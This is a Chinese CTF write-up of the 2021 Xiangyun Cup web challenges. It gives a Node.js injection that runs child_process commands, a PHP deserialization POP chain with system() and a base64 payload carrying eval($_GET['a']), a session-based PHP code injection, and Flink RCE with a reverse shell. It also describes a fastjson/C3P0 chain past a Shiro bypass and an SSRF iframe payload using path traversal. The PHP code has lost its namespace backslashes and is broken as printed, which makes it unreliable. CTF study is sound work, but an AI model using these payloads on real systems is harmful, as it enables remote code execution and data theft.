解题过程
crawler_z
注册登陆
更新信息获得token
bucket更新为服务器地址
带token访问verify
服务器写入代码
<script>
document.write(this.constructor.constructor.constructor('return process')().mainModule.require("child_process").execSync("/readflag").toString());
</script>
最后访问bucket
ezyii
Exp:
<?php
namespace CodeceptionExtension{
use FakerDefaultGenerator;
use GuzzleHttpPsr7AppendStream;
class RunProcess{
protected $output;
private $processes = [];
public function __construct(){
$this->processes[]=new DefaultGenerator(new AppendStream());
$this->output=new DefaultGenerator('jiang');
}
}
echo base64_encode(serialize(new RunProcess()));
}
namespace Faker{
class DefaultGenerator
{
protected $default;
public function __construct($default = null)
{
$this->default = $default;
}
}
}
namespace GuzzleHttpPsr7{
use FakerDefaultGenerator;
final class AppendStream{
private $streams = [];
private $seekable = true;
public function __construct(){
$this->streams[]=new CachingStream();
}
}
final class CachingStream{
private $remoteStream;
public function __construct(){
$this->remoteStream=new DefaultGenerator(false);
$this->stream=new PumpStream();
}
}
final class PumpStream{
private $source;
private $size=-10;
private $buffer;
public function __construct(){
$this->buffer=new DefaultGenerator('j');
include("closure/autoload.php");
$a = function(){system('cat /fla*');};
$a = OpisClosureserialize($a);
$b = unserialize($a);
$this->source=$b;
}
}
}
base64生成的参数
TzozMjoiQ29kZWNlcHRpb25cRXh0ZW5zaW9uXFJ1blByb2Nlc3MiOjI6e3M6OToiACoAb3V0cHV0IjtPOjIyOiJGYWtlclxEZWZhdWx0R2VuZXJhdG9yIjoxOntzOjEwOiIAKgBkZWZhdWx0IjtzOjU6ImppYW5nIjt9czo0MzoiAENvZGVjZXB0aW9uXEV4dGVuc2lvblxSdW5Qcm9jZXNzAHByb2Nlc3NlcyI7YToxOntpOjA7TzoyMjoiRmFrZXJcRGVmYXVsdEdlbmVyYXRvciI6MTp7czoxMDoiACoAZGVmYXVsdCI7TzoyODoiR3V6emxlSHR0cFxQc3I3XEFwcGVuZFN0cmVhbSI6Mjp7czozNzoiAEd1enpsZUh0dHBcUHNyN1xBcHBlbmRTdHJlYW0Ac3RyZWFtcyI7YToxOntpOjA7TzoyOToiR3V6emxlSHR0cFxQc3I3XENhY2hpbmdTdHJlYW0iOjI6e3M6NDM6IgBHdXp6bGVIdHRwXFBzcjdcQ2FjaGluZ1N0cmVhbQByZW1vdGVTdHJlYW0iO086MjI6IkZha2VyXERlZmF1bHRHZW5lcmF0b3IiOjE6e3M6MTA6IgAqAGRlZmF1bHQiO2I6MDt9czo2OiJzdHJlYW0iO086MjY6Ikd1enpsZUh0dHBcUHNyN1xQdW1wU3RyZWFtIjozOntzOjM0OiIAR3V6emxlSHR0cFxQc3I3XFB1bXBTdHJlYW0Ac291cmNlIjtDOjMyOiJPcGlzXENsb3N1cmVcU2VyaWFsaXphYmxlQ2xvc3VyZSI6MTg0OnthOjU6e3M6MzoidXNlIjthOjA6e31zOjg6ImZ1bmN0aW9uIjtzOjI5OiJmdW5jdGlvbigpe2V2YWwoJF9HRVRbJ2EnXSk7fSI7czo1OiJzY29wZSI7czoyNjoiR3V6emxlSHR0cFxQc3I3XFB1bXBTdHJlYW0iO3M6NDoidGhpcyI7TjtzOjQ6InNlbGYiO3M6MzI6IjAwMDAwMDAwMzIyMWZjMmEwMDAwMDAwMDBlNjc3MjcyIjt9fXM6MzI6IgBHdXp6bGVIdHRwXFBzcjdcUHVtcFN0cmVhbQBzaXplIjtpOi0xMDtzOjM0OiIAR3V6emxlSHR0cFxQc3I3XFB1bXBTdHJlYW0AYnVmZmVyIjtPOjIyOiJGYWtlclxEZWZhdWx0R2VuZXJhdG9yIjoxOntzOjEwOiIAKgBkZWZhdWx0IjtzOjE6ImoiO319fX1zOjM4OiIAR3V6emxlSHR0cFxQc3I3XEFwcGVuZFN0cmVhbQBzZWVrYWJsZSI7YjoxO319fX0=
post传入data获得flag
安全检测
进入后台,存在ssrf
传入http://127.0.0.1/admin/include123.php得到源码
这个过滤测试下来只能使用session
首先在url传入
http://www.baidu.com/?1=<?php+system('/getfla?.sh');?>
获取session并记录
然后在地址栏输入
http://www.baidu.com/?1=<?php+system('/getfla?.sh');?>
获得flag
层层穿透
打开题目链接发现是Apache Flink Dashboard
搜索RCE漏洞上传jar包后弹shell到msf,扫描内网发现http://10.10.1.11:8080存在附件的web服务,端口转发出来后分析附件代码,发现存在fastjson反序列化漏洞,不过需要桡过waf,/admin路由可以用shiro的权限绕过漏洞,/admin/test/即可
查看lib存在C3P0 jar包
于是利用https://github.com/depycode/fastjson-c3p0 的回显payload读取flag
admin_secret
/api/files接口可以写入files表,用目录穿越来绕过主键filename,同时,必须是本地才能访问,这里利用pdf依赖包的一个ssrf,需要写入到PDF中,但是content又过滤了<< span="">> ,这里用数组绕过
content[]=<iframe%20src%3d"http%3a//127.0.0.1:8888/api/files%3fusername%3dadmin%26filename%3d./xxx/../flag%26checksum%3dbe5a14a8e504a66979f6938338b0662c"><iframe>
下载文件得到flag
/api/files/be5a14a8e504a66979f6938338b0662c
本文始发于微信公众号(山石网科安全技术研究院):2021第二届祥云杯WEB部分Write-Up
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论